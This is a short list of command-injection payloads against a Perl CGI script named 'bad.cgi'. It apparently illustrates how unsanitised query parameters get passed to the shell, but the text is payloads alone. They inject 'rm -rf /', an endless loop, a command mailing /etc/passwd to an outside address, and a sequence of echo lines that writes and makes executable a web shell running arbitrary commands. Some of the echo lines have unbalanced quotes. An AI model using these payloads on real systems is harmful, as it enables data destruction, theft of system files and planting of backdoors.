bad.cgi?var=text;`rm -rf /`

or

bad.cgi?var=text;warn 'ha' while 1

or

bad.cgi?var=text;`mail < /etc/passwd me@isp.com`

or

bad.cgi?var=text;`echo '#!/usr/local/bin/perl' > hack.cgi`
bad.cgi?var=text;`echo 'use CGI qw/:all/;' > hack.cgi`
bad.cgi?var=text;`echo '$cmd = param("cmd");' > hack.cgi`
bad.cgi?var=text;`echo 'print header,start_html; > hack.cgi`
bad.cgi?var=text;`echo 'print \`$cmd\`, end_html; > hack.cgi`
bad.cgi?var=text;`chmod +x hack.cgi`